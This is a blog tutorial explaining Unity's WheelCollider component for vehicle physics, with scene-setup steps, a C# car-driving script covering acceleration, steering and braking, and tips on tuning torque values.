Unity Wheel Collider for Motor vehicle Tutorial 2018 Entry posted by Vivek Tank · Objective The main objective of this post is to give an idea of how to work with wheel collider and physics of Wheel Collider. Want to Make a Car Racing Game? Having troubles with Car Physics? Where to use Wheel Collider? How to use Wheel Collider? What are the components of Wheel Collider? How is Wheel Collider Different than other Colliders? Have these Questions in Your Mind? No worries... You'll know everything about Wheelcollider after reading this post. INTRODUCTION Wheel Collider is a special kind of Collider which is used for vehicles. It has in built collision detection technique and physics of actual Wheel. It can be used for objects other than wheels (like bumper Boats, bumper cars etc which uses suspension force ), but it is specially designed for vehicles with wheels. Is there is anything special which is not in other Colliders? Yes, each and every collider has something special (That’s why Unity created them). In this Collider, you will get all the components which are used to make vehicle drivable. Do have any idea about components..? No problem, I will explain components here. Before that, it's very important to understand how the Wheel Collider component works internally, to get a car working in Unity Here, I have explained everything. This is how you look at your dashing and shiny car. But, Unity doesn’t have good eyesight. So Unity looks at your car like this. 4 wheels colliders and 1 car collider, that’s it! Now Let’s Discover inside Wheel Collider. Wheel doesn’t have any shape it is Raycast based. Mass & Radius: mass and radius of the wheel. (Easy isn’t it ?) Below I had given a little introduction about physics of wheel collider. Every Wheel counts it’s sprung mass. Sprung mass (not weight) is used to apply individual force on each wheel. Suspension Distance is the distance between max droop and max compression. This suspension is calculated based on rest pose. Suspension Force(F) = (sprungMass * g ) +( jounce * stiffness) - (damper * jounceSpeed) Tire simulation rather than using dynamic or static material slip-based material is used. To learn more about physics of wheel collider click here First we need to setup Scene for that (Don’t Worry that is Easy part). PART-1: SCENE SETUP Step 1: Create a 3D plane Object give it scale of (100, 0, 100). Step 2: Create an empty Object add Rigidbody 3D. Name it as “Car” Step 3: Import 3D Car Model inside your Scene (you will get download link below) add as a child of Car. Step 4: Take Mesh Collider and add as a child of Car name it ”CarCollider”. Step 5: Create Two empty GameObject inside Car name them as “Wheel Meshed ” and “Wheel Collider”. Step 6: Inside Wheel Meshes add 4 empty GameObject name them as “FL” ,”FR” ,”RL” and “RR”. assign Mesh of Wheel (you will get download link below). Set their Position. Step 7: Inside Wheel Collider add 4 empty GameObjects name them as “Col_FL” ,”Col_FR”, ”Col_RL” and “Col_RR”. Add wheel collider as their component. Set radius of colliders same as the size of mesh and set their position same as the mesh have. Yeap, Its Done! actually that was the Difficult part to setup scene. Now Time for really easy part Scripting. PART-2: SCRIPTING (Check Script Reference Click here) [System.Serializable] public class AxleInfo { public WheelCollider leftWheelCollider; public WheelCollider rightWheelCollider; public GameObject leftWheelMesh; public GameObject rightWheelMesh; public bool motor; public bool steering; } In this AxleInfo Class, we are going to store info for a pair of the wheel. Now, Let's go for long drive . This script is to drive Car. public class CarDriver : MonoBehaviour { public List<AxleInfo> axleInfos; public float maxMotorTorque; public float maxSteeringAngle; public float brakeTorque; public float decelerationForce; public void ApplyLocalPositionToVisuals (AxleInfo axleInfo) { Vector3 position; Quaternion rotation; axleInfo.leftWheelCollider.GetWorldPose (out position, out rotation); axleInfo.leftWheelMesh.transform.position = position; axleInfo.leftWheelMesh.transform.rotation = rotation; axleInfo.rightWheelCollider.GetWorldPose (out position, out rotation); axleInfo.rightWheelMesh.transform.position = position; axleInfo.rightWheelMesh.transform.rotation = rotation; } void FixedUpdate () { float motor = maxMotorTorque * Input.GetAxis ("Vertical"); float steering = maxSteeringAngle * Input.GetAxis ("Horizontal"); for (int i = 0; i < axleInfos.Count; i++) { if (axleInfos [i].steering) { Steering (axleInfos [i], steering); } if (axleInfos [i].motor) { Acceleration (axleInfos [i], motor); } if (Input.GetKey (KeyCode.Space)) { Brake (axleInfos [i]); } ApplyLocalPositionToVisuals (axleInfos [i]); } } private void Acceleration (AxleInfo axleInfo, float motor) { if (motor != 0f) { axleInfo.leftWheelCollider.brakeTorque = 0; axleInfo.rightWheelCollider.brakeTorque = 0; axleInfo.leftWheelCollider.motorTorque = motor; axleInfo.rightWheelCollider.motorTorque = motor; } else { Deceleration (axleInfo); } } private void Deceleration (AxleInfo axleInfo) { axleInfo.leftWheelCollider.brakeTorque = decelerationForce; axleInfo.rightWheelCollider.brakeTorque = decelerationForce; } private void Steering (AxleInfo axleInfo, float steering) { axleInfo.leftWheelCollider.steerAngle = steering; axleInfo.rightWheelCollider.steerAngle = steering; } private void Brake (AxleInfo axleInfo) { axleInfo.leftWheelCollider.brakeTorque = brakeTorque; axleInfo.rightWheelCollider.brakeTorque = brakeTorque; } } I know, this script was a little bit difficult but I am here to help you. ApplyLocalPositionToVisuals (AxleInfo axleInfo) - This Method takes one argument: axleInfo. This method is used to Display rotation and position of WheelMeshes. FixedUpdate() - AxleInfo to 2. - Now add your Colliders and Meshes to appropriate Location. - We have 3 methods to Control Car Acceleration(), Steering() and Brake(). You can relate all the methods listed below. These methods are works like how actually Vehicle we drive in reality Accelerator, Brake(No Clutch here). Acceleration() - It is used to make the vehicle move forward and backward. - If forward or backward buttons are not clicked then need to add Deceleration(). - motorTorque is used to add torque (In forward or backward direction) in a vehicle. - When the vehicle is moving at that time brakeTorque is needed to change to 0. Deceleration() - It is used to stop the vehicle when forward and backward buttons are not pressed. Steering() - It is used to turn angle of vehicle. - steerAngle is used to change an angle of the the vehicle Brake() - It is used to stop the vehicle using brakeTorque property. PART-3: ASSIGNING VALUES Finally at the end, This is the last thing to make your car drivable. Enable motor if you want to Apply Force and Suspension on That Wheel. Enable Steering if you want to give rotation Force on that Wheel. Maximum Motor Torque change as per your car’s Rigidbody mass. Maximum Steering Angle must be between (30-35). Brake Torque depends on how much Brake Torque you want to apply. Deceleration Force is must be less than Brake Torque. Tip - Experiment with This Value to make your Car run smoothly. Caution - Brake Torque and Deceleration Force value need to be much higher to stop usually(1e+5 to 1e+8). Recommended Comments There are no comments to display. You need to be a member in order to leave a comment Sign up for a new account in our community. It's easy!Register a new account Already have an account? Sign in here.Sign In Now
https://www.gamedev.net/blogs/entry/2265131-unity-wheel-collider-for-motor-vehicle-tutorial-2018/
CC-MAIN-2018-39
refinedweb
1,153
52.26
I think i got rid of it with 1.6.0_17. Wondering!!! Type: Posts; User: glidealong I think i got rid of it with 1.6.0_17. Wondering!!! Thanks, i couldnt find this with my search capabilities. I still get this issue with jdk1.6.0_03 Expecting a genuine response , rather than bashing... Steps to reproduce 1. Go to 2. Take print preview from browsers' file menu 3. You can see that only the contents that fit in the first... Anyone from gxt team can confirm if this is possible, i need to commit some feature with my product manager. Please respond. Thanks and Regards, Hafiz May i know when will this fix be released? Thanks and Best Regards, Hafiz Occasionally while dragging and dropping portlets inside a portal provides wrong information for getColumn(), getRow(), getStartColumn(), getStartRow() information. This is causing quite a lot of... Is it possible to enable drag and drop for tab item inside a tab panel, so that i can rearrange the order of the tab items by simply dragging and dropping the items inside the tabpanel? Thanks and... Yes, i have my deliverable planned for release this month. All you need to do is insert the iframe html into one the div inside the portlet. And make sure you port all javascript code in the... Oops, my bad, sorry for the mistake. Thanks and Regards, hafiz This is basically the same issue as reported in I am having the same issue with 2.0.1 version. Basically, if you have 2 groups of radio buttons,... I am using 2.0.1 and facing the same issue, is the fix available in this version. Please let me know? Thanks and Regards, Hafiz I am faced with something similar, where we want to style various message boxes differently depending on the type of error. It requires me to add styles to the messagebox for my css developers to... private Listener<PortalEvent> portletDragnDropListener = new Listener<PortalEvent>() { public void handleEvent(PortalEvent be) { (... It is possible, i have achieved it. You need to make the application you are developing an opensocial container. Please refer to... Yes , i could solve the issue by making use of YUI menu. I overriden the tabpanel constructor with public class CustomTabPanel extends TabPanel { Ask for it and you get it I just found the answer, it is in PortalEvent and not to be looked in portlet. I need to store the state of a portal into the database. For this i need to identify an event that is fired when a portlet is dragged and dropped into a new position and i need to extract the... Yep 1+ Why can't header item be a container? Thanks and Regards, Hafiz I have been thinking on how to implement a event bubbling metaphor in gxt as i felt it was one of the important factors needed in developing an event driven application. Any user interaction in... Hi there, We are looking into making GXT portal compatible with open social standards so that we can seamlessly integrate the various gadgets available at igoogle and to develop our gadgets which... I am developing a portal which requires me to embed google gadgetsas an igoogle portlet (the way it is seen in igoogle) with all the settings and other options as it is. It means I would like to add... I am actually building a custom menu by using toolbar and buttons, i need to listen to events fired by the composited buttons at my 'custom menu' instance. Thanks for the response. Best... To my dismay i just found that extgwt components doesn't bubble the events up the DOM. But if you use a GWT component the events are bubbling up the DOM hierarchy. I just tested with extgwt button...
https://www.sencha.com/forum/search.php?s=72ecd22719fce668dcd59304e10f10f1&searchid=20487736
CC-MAIN-2018-17
refinedweb
632
74.19
Up until now, materials only had access to constants stored in the material itself, or attributes associated with the mesh vertices. However, in certain cases it is convenient to provide parameters associated with individual objects that use that material. This patch addresses that use case by adding two connected features to the Attribute node. A new 'Alpha' output socket is added to the Attribute node, which returns the fourth channel of the attribute if available. Currently there already is a four channel attribute (vertex color), but the alpha channel is only accessible through the dedicated Vertex Color node. This extends the generic attribute node to handle that case. If the attribute has fewer than 4 channels, the 'alpha' value is not well specified, but generally seems to be 1. As the main feature, a new dropdown allows switching the node from accessing Geometry attributes to the Object or Instance mode. In those modes the attribute name is interpreted as the name of a custom property, or a generic RNA path like the one produced by Copy Data Path. The Object mode searches for the property in the object and its data ID in that order. The Instance mode additionally looks first in the particle system settings and the instance parent object if the current object was instanced. This feature supports properties that are integer, float, or a float array of up to 4 components. The values are appropriately padded to have 4 channels, and the alpha channel is guaranteed to default to 1 if the property exists, or 0 if it was not found. The primary reason for introducing the Geometry/Object/Instance dropdown is that without a way to distingush varying and uniform attributes when the material is compiled it would be very difficult to implement this for Eevee. Eevee is also limited to only 8 such attributes per material because of hardware limitations on UBO size. Cycles seems to be designed with a common namespace for all attributes in mind, so the cycles-blender interface translates attribute types by internally adding a name prefix. The code is available as individual commits at: Test file (updated): Now I understand the DRW part better. I don't have any issue with the implementation details. It's mostly code style issues / lack of documentation. After theses are fixed, it's a greenlight for me. Why not use a BLI_bitmap? I think this code is better suited to be put inside draw_instance_data.c, which already does something similar. It's a DRW structure. Use DRW prefix. Also Same thing as the GPU struct, could abreviate to DRWUniformAttrBuf (naming style of the GPU module). This really lack some comment on the data structure. Please add some comment about the whole struct and each members. Why is the next pointer at the end of the struct? Is this a linklist? Ok I just saw this is used only when deleting the buffers. Then put it in a comment or/and rename the pointer next_orphan. I don't like having this type here. Maybe just use BLI_math_vector.h functions with a float[4] for readability and code consistency. I'm starting to think the name is a bit too verbose but that's a bit personal as I tend to like shorter names. The fact we have GPUMaterialTexture is to avoid mixing with the GPUTexture. I would prefer GPUUniformAttr or at least GPUMaterialUniformAttr (attr is ubiquitous in the codebase). Same for GPUMaterialUniformAttributeSet which could be rename to GPUUniformAttrList. use plural and specify it contains ubos. The container type can be viewed in other ways. It's not obvious that this function can return NULL. Add a comment on top of it's declaration. Add a comment that says that this is the case when there is not enough GPU slots. Nitpick: Isn't Attribs supposed to be at max a vec4? Overallocating is safer than underallocating ;) Updated as requested. I won't be able to review it properly in the next two weeks. So I'm tagging @Jeroen Bakker (jbakker) as reviewer instead of me to avoid stalling the review. In EEVEE, when using a float property the data is send to the GPU as (prop_value, prop_value, prop_value, 1) when read in the node_attribute it is averaged so it will be (prop_value * 3.0 + 1.0) / 4.0 this isn't what the user expects. Might be related to the change of how Alpha values are handled. Fixed attribute float output.? If there is a big performance impact, refactoring the code so that there are no separate primitive_attribute functions per data type may help. I think this should default to all zero. For 3-channel colors it can set alpha to 1, but I would not do this for arbitrary 4D float arrays. This can be wrapped in a AttributeRequestSet requests = object->needed_attributes() function, next to the need_attribute function. We may need to add additional logic here besides just looping over shaders, and I want to keep that abstracted away like it is for need_attribute. Rather than a prefix for the name, there should be an additional field in AttributeRequest. I don't really see a reason to use special prefixes here. Overriding should be the other way around, that's how it works in other renderers and 3D software that I'm aware of and so will be better for interop. For example a per curve point radius on hair should override a radius per curve, which should override a radius for the entire object. Can you add a comment explaining the chain link thing? Index into what? This needs a better name/description. This should be a protected member, not mixed with the public members. This seems like something that can be committed already if it's required. I'd rename this to "Instancer", for consistency with the "From Instancer" option in the texture coordinate node. "Instance" implies to me some different value per instance, not a shared value for all objects instanced by an instancer. caused the instancing -> instanced it I completely disagree - defaulting the alpha to 1 for existing attributes, and 0 for missing ones allows detecting if the property was found. Also, for all varying attributes alpha already defaults to 1, and has to be that way due to how it works in eevee, which apparently has basis in OpenGL itself. The reason for prefixes is that the uniform attributes form a completely separate namespace in Blender with a dropdown in the node (required by Eevee), but Cycles already has all attributes in a single namespace looked up only by name. This information must be part of the attribute key, i.e. attribute "foo" with types Geometry, Object and Instance are all separate attributes, which can be used simultaneously by the same material shader. This would be impossible to achieve in the SVM case without either completely duplicating the mesh attribute maps, scanning through the whole list until the end, or introducing a separate attribute map index for objects instead of linking. The way I implemented is that object maps only contain object attributes, and then link to the mesh maps. It's simple: to avoid duplicating the mesh maps for each objects with object attributes, maps now can link to other maps like a linked list, so object maps only have object attributes, and then link to the mesh map. Since this is your code originally, if you have a better implementation idea I'd gladly hear it. Index into mesh vector? It's used to access the temporary attribute data arrays by index when all you have is a mesh pointer. This makes sense since all other allocation functions for bitmap use calloc, and the DRWSparseUniformBuffer added in this patch depends on this. Updated to address feedback. Fixed a few missed places that should now use NODE_ATTR_OUTPUT_FLOAT3 (broke all tests) In D2057#221139, @Brecht Van Lommel (brecht) wrote:? Just checked with CUDA on BMW and there seems to be no discernible difference. Can't test OpenCL because blender says it's not supported with my gpu (maybe actually I'm missing some library package, but I have no idea). I made a branch build, so maybe somebody else can test too: I tested the test file of this diff on OpenCL and seems to be working fine. In D2057#228939, @Jeroen Bakker (jbakker) wrote: I tested the test file of this diff on OpenCL and seems to be working fine. I tested the test file of this diff on OpenCL and seems to be working fine. What about performance? I tested that there is no observable decrease in Cycles rendering speed on BMW with CUDA. Brecht raised a concern that adding more kernel code could affect things even when it's not called. Committed the Cycles internal changes to master, rebasing patch on them. From my testing there should be no performance regressions in GPU rendering. Approving the Cycles and shader UI part of this. Have not looked at the Eevee implementation. When this gets committed, be sure to add a test to the regression test files. Removing reviewers from 2016. In D2057#232150, @Brecht Van Lommel (brecht) wrote: Approving the Cycles and shader UI part of this. Have not looked at the Eevee implementation. When this gets committed, be sure to add a test to the regression test files. Question, when this gets committed, can we revert the fix for: ? In D2057#232302, @Jagannadhan Ravi (easythrees) wrote: Question, when this gets committed, can we revert the fix for:? Question, when this gets committed, can we revert the fix for:? D9322 is not related to this patch. There is another workaround in the multithreaded export related to dupli particles. For that I plan to implement a better solution using object attributes to store per-instance particle info. But it's not there yet. Fixed a race condition caused by the recent addition of threaded geometry update. @Jeroen Bakker (jbakker) @Clément Foucault (fclem) So what is the conclusion on the Eevee part of the patch? @Brecht Van Lommel (brecht) Created a quite thorough test file, will commit when the patch is in. Does the used_shaders race condition fix look OK? All the outstanding issues have been addressed for the EEVEE/viewport part and have approved the patch.
https://developer.blender.org/D2057?id=28548
CC-MAIN-2020-50
refinedweb
1,718
64.61
mercurial is a distributed source control management tool. Hg::Lib is an interface to its command server. THIS CODE IS ALPHA QUALITY. This code is incomplete. Interfaces may change....DJERIUS/Hg-Lib-0.01 - 05 Feb 2013 04:14:55 GMT When you execute a script found in, for example, "gist", you'll be annoyed at missing libraries and will install those libraries by hand with a CPAN client. We have repeated such a task, which violates the great virtue of Laziness. Stop doing it, mak...GFUJI/lib-xi-1.03 - 25 Jan 2014 02:46:02 GMT MONS/ex-lib-0.90 - 21 Jul 2009 15:58:05 GMT A Fry::Lib object has the following attributes: Attributes with a '*' next to them are always defined. *id($): Unique id which is full name of module. *vars(\@): Contains ids of variables in its library. *opts(\@): Contains ids of options in its libr...BOZO/Fry-Shell-0.15 - 12 Jan 2005 17:34:38 GMT PSHANGOV/lib-ini-0.002 - 14 Sep 2012 11:32:37 GMT Sub::Lib allows you to store sub-routines into a common library which can then passed around as a variable. It's a run-time namespace....PRAVUS/Sub-Lib-0.03 - 04 Apr 2017 14:07:07 GMT The ALEXBYK/Evo-0.0405 - 18 Jul 2017 22:54:34 GMT Searches upward from the calling module for a directory t with a lib directory inside it, and adds it to the module search path. Looks upward up to 5 directories. This is intended to be used in test modules either directly in t or in a subdirectory t...HAARG/Test-Lib-0.002 - 16 Aug 2014 01:04:57 This module globs the given paths and adds then to @INC. Several path patterns can be passed in a single call separated by colons (or by semicolons on Windows)....SALVA/lib-glob-0.02 - 02 Sep 2009 17:06:14 GMT GRIAN/lib-deep-0.93 - 16 Apr 2014 19:47:56 GMT GOMOR/Lib-Furl-1.00 - 01 Nov 2012 17:08:27 GMT Given a list of module names, it will make subsequent loading of those modules a no-op. It works by installing a require hook in @INC that looks for the specified modules to be no-op'ed and return "1;" as the source code for those modules. This makes...PERLANCAR/lib-noop-0.002 - 27 Dec 2016 11:31:08 GMT This is the package that interfaces to GIMP via the libgimp interface, i.e. the normal interface to use with GIMP. You don't normally use this module directly, see Gimp....ETJ/Gimp-2.32 - 08 May 2016 14:43:08 GMT The - 17 Sep 2011 22:39:34 GMT This pragma is used to test a script under a condition of empty @INC, for example: fatpacked script....SHARYANTO/lib-none-0.02 - 12 Apr 2014 14:58:52 GMT This pragma is a shortcut for lib::filter. This: use lib::allow qw(Foo Bar::Baz Qux); is equivalent to: use lib::filter allow_core=>0, allow_noncore=>0, allow=>'Foo;Bar::Baz;Qux';...PERLANCAR/lib-filter-0.27 - 24 Aug 2016 02:36:39 GMT This GMT
https://metacpan.org/search?q=module%3Alib
CC-MAIN-2018-51
refinedweb
537
67.25
#include <CbcBranchCut.hpp> Inheritance diagram for CbcCutBranchingObject: This object can specify a two-way branch in terms of two cuts Definition at line 108 of file CbcBranchCut.hpp. Default constructor. Create a cut branching object. Cut down will applied on way=-1, up on way==1 Assumed down will be first so way_ set to -1 Copy constructor. Destructor. Assignment operator. Clone. Implements CbcBranchingObject. Sets the bounds for variables or adds a cut depending on the current arm of the branch and advances the object state to the next arm. Returns change in guessed objective on next branch Implements CbcBranchingObject. Print something about branch - only if log level high. Return true if branch should fix variables. Reimplemented from OsiBranchingObject. Return the type (an integer identifier) of this. Implements CbcBranchingObject. Definition at line 159 of file CbcBranchCut. Cut for the down arm (way_ = -1). Definition at line 183 of file CbcBranchCut.hpp. Cut for the up arm (way_ = 1). Definition at line 185 of file CbcBranchCut.hpp. True if one way can fix variables. Definition at line 187 of file CbcBranchCut.hpp.
http://www.coin-or.org/Doxygen/CoinAll/class_cbc_cut_branching_object.html
crawl-003
refinedweb
181
60.51
Hello, I am currently working on a program that is supposed to do the following: I am supposed to take a data file of 5 student names that are in the following form: lastName firstName middleName. I am supposed to convert each name to the following form: firstName middleName lastName. The program must read each students entire name in a variable and must consist of a function that takes as input a string, consist of a students name, and returns the string consisting of the altered name. Use the string function FIND to find the index of ,; the function LENGTH to find the length of the string: and the function SUBSTR to extract the firstName, middleName, and lastName. Here is my data file being used: Miller, Jason Brian Blair, Lisa Maria Gupta, Anil Kumar Arora, Sumit Sahil Saleh, Rhonda Beth Here is my program so far. I am not sure if I am on the right track or not. #include <iostream> #include <string> #include <fstream> #include <cassert> #include <cfloat> using namespace std; int main() { ifstream fin; fin.open(inputstudent.data()); assert ( fin.is_open()); int count=0; double rading sum=0.0; for(;;) { fin >> reading; if (fin.eof())break; count++; } fin.close(); string outputname; getline (cin, outputname); ofstream fout (outputname.data()); assert(fout.is_open()); fout.close(); void reverseName (char inName[], char outName[]) { char firstname[40]; char lastname [40];char last[40]; char first [40]; strcpy(firstname, last); strcpy(lastname, first); strcpy(firstname, lastname); strcat(lastname, last); strcat(firstname, first); }
https://www.daniweb.com/programming/software-development/threads/322183/help-to-sort-and-arrange-names-with-c
CC-MAIN-2021-25
refinedweb
248
62.27
ParticleWebLog (community library) Summary Sends logs to the Particle servers via publish This provides remote logging with a very tiny memory footprint. Logs can be viewed in the Particle console or use the Particle webhook feature to send those log messages to the logging service of your choice (such as loggly.com). Library Read Me This content is provided by the library maintainer and has not been validated or approved. ParticleWebLog A Particle library for remote logging via publish(). And example config for loggly.com. I wrote this tiny logging framework because I wanted something that would allow remote logging but use very little FLASH space. Other benefits: - Messages are not sent in cleartext (they are inside the particle encrypted link). - Because this library doesn't use UDP, it is probably a more resistant to carrier throttling on cellphone networks (i.e. for the Electron) Usage #include "ParticleWebLog.h" ParticleWebLog particleWebLog; void setup() { Log.info("Hi I'm a log message"); } void loop() { } See the examples folder for more details. Documentation This library merely registers a log provider that publishes each logged string as a particle publish event. The events will be published using the name of your choice (defaults to "log"). Limitations: - This tiny library is built on top of Particle.publish, so you should not print log message too quickly if you are using it. It might drop messages if you send more than about 1 a second. - Third generation particle devices have lots of log messages from the system some of which seem to come out before publishing is legal. So this log provider only logs "app" messages. Using web logging services One of the great things about this approach is that the Particle.io web service has good webhook support. So you can squirt these crude log messages to a nice storage/viewer service. Most any service that has a way to accept HTTP posts of log messages should work. Here is an example using loggly.com: - Go to loggly.com and create a free account (you can pick any domain name). - Go to the console for your domain: and setup an HTTPS log source. It will give you an URL that looks approximately like this:. - Go to the Particle.io web console and click on "Integrations / New Integration / Webhook". - On the form it shows, enter "log" for Event Name, the URL you were provided above, change the request format to JSON. - Then click to enter custom JSON data and paste in the following: { "message": "", "from": "", "published_at": "", "userid": "", "fw_version": "" } - Click "save" to save your new integration. - In the top right of the integration you should now see a "Test" button. You can click it to test that the Particle server is now able to talk with Loggly. - Any new log publishes from your device should now be stored in Loggly. Contributing I will happily accept pull requests and respond to issues raised in github. Thanks to @barakewi for his Papertrail library which was used as a template to create this library. LICENSE Licensed under the Browse Library Files
https://docs.particle.io/cards/libraries/p/ParticleWebLog/
CC-MAIN-2021-21
refinedweb
512
66.23
» Game Development Author Poker Johannes Thorén Ranch Hand Joined: Nov 18, 2008 Posts: 64 posted Nov 18, 2008 12:35:00 0 Hello everyone, im new here and im also new intoo the magic world of java . I just started my java class in school and i got the assignment to make a pokergame in Java and to put it on a website. I figured that i should make a 'simple' 5 card "casino" poker client since it probobly would be the easyest thing to make. But now i realized that it isint as easy as i thought. Could anyone help me get my head straight in what way i should build it, if anyone knows any good tutorlials or wants to talk java over msn or so. Give me a pm if you can! Thanks Gregg Bolinger GenRocket Founder Ranch Hand Joined: Jul 11, 2001 Posts: 15300 6 I like... posted Nov 18, 2008 12:47:00 0 When you say "put it on a website" do you mean you are supposed to make an applet using the Swing API or a web application using JSP/Servlet ( JEE spec)? GenRocket - Experts at Building Test Data Paul Yule Ranch Hand Joined: May 12, 2008 Posts: 229 posted Nov 18, 2008 13:31:00 0 Are you having trouble with the basic how to design the poker architecture/logic or trouble with understanding how to get your finished product "out there?" Johannes Thorén Ranch Hand Joined: Nov 18, 2008 Posts: 64 posted Nov 19, 2008 02:35:00 0 Right now i havint started programming at all. I dont know if i should use the Swing API or JEE, i bought a book thats called "Java with Swing". Right now i dont know how to do anything, just programmed some basic field things. I just know that i got the mission to make a poker client, register a domain, and put the pokerclient on the domain so everyone could play it. Right now this seems cind of impossible. This seams like a good forum, 2 responces in a day aint too bad Kind Regards, Johannes Gregg Bolinger GenRocket Founder Ranch Hand Joined: Jul 11, 2001 Posts: 15300 6 I like... posted Nov 19, 2008 08:50:00 0 Johannes, I'd be surprised if an instructor is really that vague about requirements for a project. There is a monumental difference in creating a Swing application and a web application. To go through the trouble for one, be successful, but be wrong because your instructor meant something else would be horrible. I also find it odd that an assignment like this is your first one. Is this maybe your final project assignment and the instructor has given it to you early to work on for the duration of the class? If that is the case, you'll need to approach it differently because you will learn things in class as you go along that will help with this project. I'd suggest finding out which direction you are supposed to go and then let us know. Johannes Thorén Ranch Hand Joined: Nov 18, 2008 Posts: 64 posted Nov 19, 2008 09:44:00 0 Its a course we have here in Sweden called Projectwork, and i decided to have programming as my major. I programmed Actionscript 2.0 for 3 months untill last week when i started with Java, were going to work with java untill june. My poker game needs to be done in mars. I could do a game in Actionscript since then i can just insert photos of cards and name them. I dont know how to do that in Java. In Java i also need to make the graphics. Does anyone know some good site where there is some poker tutorials? Or graph making toturials. How to attatch photos to the program and such. I guess i need to make an array for card colour 0-3, and one for value 0-13, and then make it random one colour and one value. and then if its like 0, 0 it should load the picture Ace of hearts. vanlalhmangaiha khiangte Ranch Hand Joined: Sep 11, 2006 Posts: 170 posted Nov 20, 2008 02:49:00 0 Hi , Are all the players going to be AI .. or they are all human players .. I think more important than the graphics right now is the logic ... Finalise what variation of poker you want. Saw this site poker in applets Graphics are nice .. i think they use this in facebook ... Casual googling lead me to here here web based poker game Really interesting project .. i love the game of poker .. Needs lots of thinking Gavin Tranter Ranch Hand Joined: Jan 01, 2007 Posts: 333 posted Nov 24, 2008 06:05:00 0 I wouldnt use an array for the cards. I would (and did until i got bored) used a couple of enums, with an ArrayList rather then an array. It strikes me as a rather large projet for a 3 month course, and that registering a domian is a little starnge and adds extra cost, whats wrong with the insitutes servers? When we did web-projects we hosted on our account on the uni serves. The thing i founded hardest was the logic of poker, (in hold'em) how from 7 cards to decide which were the best 5 cards in a hand. So i would advise understanding the basic rules of the type of poker you decide to implement. G Johannes Thorén Ranch Hand Joined: Nov 18, 2008 Posts: 64 posted Nov 24, 2008 10:25:00 0 I think i got the logics, but im not going to do hold'em, just a 5 card poker casino game. something like this one, exept that i dont want the cards to disapear i want every hand to be with a full deck of cards: (made in actionscript 2.0) What is an enums? And whats the difference from arrays? (int test [] = new int[x]) I didint need to get an own domain, i just felt like it would look more professional. Gavin Tranter Ranch Hand Joined: Jan 01, 2007 Posts: 333 posted Nov 26, 2008 03:17:00 0 Basicly, and this is not the best description ever, but an enum is a class that allows you to enumerate constants. So if you had the days of the week: Monday Tuesday etc, you might chose to hold them in an array as Strings, or as int constants nameed Monday etc: public class DaysOfTheWeek{ public static final int MONDAY = 1; public static final int TUESDAY = 2; .... public static final int SUNDAY = 7; } This has several disadvantages, such as there is no type checking, as its the day of week is an int, so you could call a method that is expecting a day of teh week with an any old int. ... public void doSomething(int dayOfWeek){ code that expects day of week to be an int between 1-7 } ... public void work(){ doSomething(8); } An Enum is a special type of class that does pretty much the same thing, but is type safe, in that any method that expects day of teh week, can only accept one of the enumerated days of teh week: public enum DaysOfWeek{ MONDAY,TUESDAY,WEDENSDAY,THURSDAY,FRIDAY,SATURDAY,SUNDAY } Now any methods that requires a DayOfTheWeek can only accept a day of the week. Enums can be used in switch statements etc. Check out the Sun documentation on Enums, you might find it interesting. G I agree. Here's the link: subject: Poker Similar Threads unable to open web sevice page Very New To Java Question Help Please! how to upload images How to start investing in shares? Speech to text conversion using JAVA All times are in JavaRanch time: GMT-6 in summer, GMT-7 in winter JForum | Paul Wheaton
http://www.coderanch.com/t/416602/Game-Development/java/Poker
CC-MAIN-2014-52
refinedweb
1,315
76.76
Angular has a powerful template engine that lets us easily manipulate the DOM structure of our elements. This guide looks at how Angular manipulates the DOM with structural directives and how you can write your own structural directives to do the same thing. Try the What are structural directives?What are structural descendents. Structural directives are easy to recognize. An asterisk (*) precedes the directive attribute name as in this example. No brackets. No parentheses. Just *ngIf set to a string. You’ll learn in this guide that the asterisk (*) is a convenience notation and the string is a microsyntax rather than the usual template expression. Angular desugars this notation into a marked-up <template> that surrounds the host element and its descendents. Each structural directive does something different with that template. Three of the common, built-in structural directives — NgIf, NgFor, and NgSwitch… — are described in the Template Syntax guide and seen in samples throughout the Angular documentation. Here’s an example of them in a template: This guide won’t repeat how to use them. But it does explain how they work and how to write your own structural directive. Directive spellingDirective spelling Throughout this guide, you’ll see a directive spelled in both UpperCamelCase and lowerCamelCase. Already you’ve seen NgIf and ngIf. There’s a reason. NgIf refers to the directive class; ngIf refers to the directive’s attribute name. A directive class is spelled in UpperCamelCase ( NgIf). A directive’s attribute name is spelled in lowerCamelCase ( ngIf). The guide refers to the directive class when talking about its properties and what the directive does. The guide refers to the attribute name when describing how you apply the directive to an element in the HTML template. There are two other kinds of Angular directives, described extensively elsewhere: (1) components and (2) attribute directives. A component manages a region of HTML in the manner of a native HTML element. Technically it’s a directive with a template. An attribute directive changes the appearance or behavior of an element, component, or another directive. For example, the built-in NgStyle directive changes several element styles at the same time. You can apply many attribute directives to one host element. You can only apply one structural directive to a host element. NgIf case studyNgIf case study NgIf is the simplest structural directive and the easiest to understand. It takes a boolean expression and makes an entire chunk of the DOM appear or disappear. The ngIf directive doesn’t hide elements with CSS. It adds and removes them physically from the DOM. Confirm that fact using browser developer tools to inspect the DOM. The top paragraph is in the DOM. The bottom, disused paragraph is not; in its place is a comment about “template bindings” (more about that later). When the condition is false, NgIf removes its host element from the DOM, detaches it from DOM events (the attachments that it made), detaches the component from Angular change detection, and destroys it. The component and DOM nodes can be garbage-collected and free up memory. Why remove rather than hide?Why remove rather than hide? A directive could hide the unwanted paragraph instead by setting its display style to none. While invisible, the element remains in the DOM. The difference between hiding and removing doesn’t matter for a simple paragraph. It does matter when the host element is attached to a resource intensive component. Such a component’s behavior continues even when hidden. The component stays attached to its DOM element. It keeps listening to events. Angular keeps checking for changes that could affect data bindings. Whatever the component was doing, it keeps doing. Although invisible, the component—and all of its descendant components—tie up resources. The performance and memory burden can be substantial, responsiveness can degrade, and the user sees nothing. On the positive side, showing the element again is quick. The component’s previous state is preserved and ready to display. The component doesn’t re-initialize—an operation that could be expensive. So hiding and showing is sometimes the right thing to do. But in the absence of a compelling reason to keep them around, your preference should be to remove DOM elements that the user can’t see and recover the unused resources with a structural directive like NgIf . These same considerations apply to every structural directive, whether built-in or custom. Before applying a structural directive, you might want to pause for a moment to consider the consequences of adding and removing elements and of creating and destroying components. The asterisk (*) prefixThe asterisk (*) prefix Surely you noticed the asterisk (*) prefix to the directive name and wondered why it is necessary and what it does. Here is *ngIf displaying the hero’s name if hero exists. The asterisk is “syntactic sugar” for something a bit more complicated. Internally, Angular desugars it in two stages. First, it translates the *ngIf="..." into a template attribute, template="ngIf ...", like this. Then it translates the template attribute into a template element, wrapped around the host element, like this. - The 